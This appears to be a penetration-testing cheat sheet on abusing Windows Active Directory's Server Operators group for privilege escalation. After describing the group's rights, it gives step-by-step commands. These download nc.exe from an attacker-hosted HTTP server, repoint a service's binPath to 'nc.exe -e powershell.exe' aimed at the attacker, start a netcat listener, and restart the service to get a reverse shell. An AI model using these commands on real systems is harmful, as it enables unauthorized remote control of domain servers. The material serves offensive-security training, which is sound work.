PRIMARY CATEGORY → HIGH PRIVILEGED GROUPS
REFERENCES | |
---|---|
Windows Privesc Server Operators Group | See here |
The Server Operators group is an Active Directory Security Group, also known as Privileged Groups
The main function of this group is basically to allow certain users to perform some administrative tasks without make them part of the Administrators Group or making them Domain Admins
Among the privileges enjoyed by members of this group, the following are highlighted
- Start, Stop and Restart Services
- Shutting down and Switching On Servers, including the Domain Controller
- Manage Shared Resources
- Backup and Restore Files in the Domain Controller
SEBackupPrivilege & SERestorePrivilege
- Remote Access to the Domain Controller through Administration Tools
Local Privilege Escalation
Check Group Membership
Once a shell is obtained in the Remote Host as a non-privileged user, simply check if the user belongs to the Server Operators Group
whoami /groups
net user <USER>
If not, just check which system users belong to this group and try to pivot to one of them
Get-ADGroupMember -Identity "Server Operators"
List Available | Running Services
If Evil-WinRM is used to establish a connection to the target via WinRM, use the following tool-specific command to list the running services and the path of their associated binary
services
Choose a non-critical service to modify its binary path to the path of the netcat binary that the attacker will upload
Therefore, proceed as follows →
Upload a Netcat Binary
From the Attacker
python3 -m http.server <PORT>
From the Target
IWR -UseBasicParsing -Uri 'http://<TARGET>:<PORT>/nc.exe' -OutFile 'C:\Windows\Temp\nc.exe'
Modify the Binary Path of the Service
Modify the default binary path of the service to that of nc.exe by passing it the following arguments to send a reverse shell to the attacker machine
sc.exe config <SERVICE> binPath="C:\Windows\Temp\nc.exe -e powershell.exe <TARGET> <PORT>"
Stop and Start the Service
Once the binary path of the previous service has been modified, simply restart the service having previously set up a listening port on the attacker
From the Attacker
rlwrap -CaR nc -nlvp <PORT>
From the Target
sc.exe stop <SERVICE>
sc.exe start <SERVICE>